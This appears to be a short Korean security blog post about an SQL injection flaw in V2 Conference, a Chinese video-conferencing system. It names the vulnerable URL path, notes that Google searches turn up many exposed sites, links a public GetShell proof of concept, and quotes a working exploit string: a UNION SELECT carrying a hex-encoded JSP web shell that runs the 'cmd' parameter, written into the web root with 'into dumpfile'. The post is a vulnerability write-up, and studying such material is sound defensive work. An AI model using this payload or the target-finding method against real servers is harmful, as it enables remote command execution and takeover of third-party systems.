메뉴 건너뛰기

Hello :0

V2 Conference는 중국에서 만들어진 영상회의 시스템이다.

 

1.png

5월 정도에 sqlinjection 관련 취약점 글이 올라 왔고, 취약점을 이용한 공격이 종종 발생되는 것으로 보인다.

/Conf/jsp/systembulletin/bulletinAction.do?operator=details&sysId 포함한 다수 URL에서 SQL injectin이 가능한 것으로 확인된다.

 

2.png

구글로 해당 URL을 검색하면, 다수의 사이트에서 V2 Conference를 사용함을 확인 할 수 있다.

 

3.png

SQL injectin 공격으로 v2 conference 관리자 계정정보를 획득 할 수 있다.

 

https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/V2_Conference/V2_Conference_GetShell.py

위의 URL에서 POC코드를 확인 할수 있다. POC에서는 POST Method를 이용하여 대상 서버에 웹쉘을 생성할 수 있다.

exp = """/Conf/jsp/systembulletin/bulletinAction.do?operator=modify&sysId=1 UNION SELECT 
1,2,3,4,0x497420776F726B7321DA3C2540207061676520636F6E74656E74547970
653D22746578742F68746D6C3B20636861727365743D47424B2220253EDA3C254020
7061676520696D706F72743D226A6176612E696F2E2A2220253E203C252053747269
6E6720636D64203D20726571756573742E676574506172616D657465722822636D64
22293B20537472696E67206F7574707574203D2022223B20696628636D6420213D20
6E756C6C29207B20537472696E672073203D206E756C6C3B20747279207B2050726F
636573732070203D2052756E74696D652E67657452756E74696D6528292E65786563
28636D64293B204275666665726564526561646572207349203D206E657720427566
6665726564526561646572286E657720496E70757453747265616D52656164657228
702E676574496E70757453747265616D282929293B207768696C65282873203D2073
492E726561644C696E6528292920213D206E756C6C29207B206F7574707574202B3D
2073202B225C725C6E223B207D207D20636174636828494F457863657074696F6E20
6529207B20652E7072696E74537461636B547261636528293B207D207DDA6F75742E
7072696E746C6E286F7574707574293B253EDA into 
dumpfile '../../management/webapps/root/V2ConferenceCmd.jsp'%23"""

UNION SELECT를 사용하여 hex값으로 웹쉘을 만들고 이것을 dumpfile명령어를 사용하여 특정 폴더에 생성하는 것을 확인 가능하다.